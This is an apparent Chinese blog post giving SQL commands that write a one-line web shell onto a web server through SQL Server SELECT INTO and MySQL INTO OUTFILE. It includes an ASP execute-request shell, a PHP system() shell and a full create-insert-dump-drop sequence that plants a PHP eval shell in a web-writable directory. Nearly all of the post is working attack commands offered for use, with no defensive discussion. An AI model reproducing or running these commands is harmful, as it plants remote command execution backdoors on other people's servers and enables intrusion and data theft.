SQL语句生成一句话

1、SQLServer执行SQL语句生成一句话

select '<%execute request("a")%>' into [NB_master] in
 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master;

NB_master必须是已经存在的表

2、MySQL执行SQL语句生成一句话

select "<?php @system($_POST["cmd"]);?>" into outfile 
"/home/webaccount/projectname/www/*.php";

3、完整执行如下：

create table a (cmd text not null); insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '网站可写路径/一句话马名.php'; drop table if exists a;

posted @ 2021-04-28 17:01 只是条咸鱼罢了阅读(345) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

只是条咸鱼罢了

SQL语句生成一句话

1、SQLServer执行SQL语句生成一句话

2、MySQL执行SQL语句生成一句话

3、完整执行如下：

公告